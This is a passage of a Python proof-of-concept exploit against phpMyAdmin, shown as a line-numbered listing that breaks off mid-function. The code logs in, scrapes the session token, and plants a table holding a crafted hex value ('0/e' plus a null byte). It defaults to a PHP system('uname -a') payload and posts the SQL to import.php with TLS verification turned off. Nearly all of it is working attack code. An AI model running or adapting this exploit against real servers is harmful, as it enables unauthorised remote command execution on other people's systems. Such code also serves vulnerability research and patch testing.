| 30 | def poc(url): |
| 31 | url_to_pma = url |
| 32 | uname = USER |
| 33 | upass = PASS |
| 34 | |
| 35 | if DATABASE: |
| 36 | db = DATABASE |
| 37 | else: |
| 38 | db = "test" |
| 39 | |
| 40 | custom_table = False |
| 41 | if TABLE: |
| 42 | custom_table = True |
| 43 | table = TABLE |
| 44 | else: |
| 45 | table = "prgpwn" |
| 46 | |
| 47 | if COMMAND: |
| 48 | payload = COMMAND |
| 49 | else: |
| 50 | payload = "system('uname -a');" |
| 51 | |
| 52 | s = requests.Session() |
| 53 | s.verify = False |
| 54 | sql = '''CREATE TABLE `{0}` ( |
| 55 | `first` varchar(10) CHARACTER SET utf8 NOT NULL |
| 56 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; |
| 57 | INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500')); |
| 58 | '''.format(table) |
| 59 | |
| 60 | # get_token |
| 61 | resp = s.post(url_to_pma + "/?lang=en", dict( |
| 62 | pma_username=uname, |
| 63 | pma_password=upass |
| 64 | )) |
| 65 | if resp.status_code is 200: |
| 66 | token_place = resp.text.find("token=") + 6 |
| 67 | token = resp.text[token_place:token_place + 32] |
| 68 | else: |
| 69 | # print("Cannot get valid authorization token.") |
| 70 | return False |
| 71 | |
| 72 | if custom_table is False: |
| 73 | data = { |
| 74 | "is_js_confirmed": "0", |
| 75 | "db": db, |
| 76 | "token": token, |
| 77 | "pos": "0", |
| 78 | "sql_query": sql, |
| 79 | "sql_delimiter": ";", |
| 80 | "show_query": "0", |
| 81 | "fk_checks": "0", |
| 82 | "SQL": "Go", |
| 83 | "ajax_request": "true", |
| 84 | "ajax_page_request": "true", |
| 85 | } |
| 86 | resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies)) |
| 87 | if resp.status_code == 200: |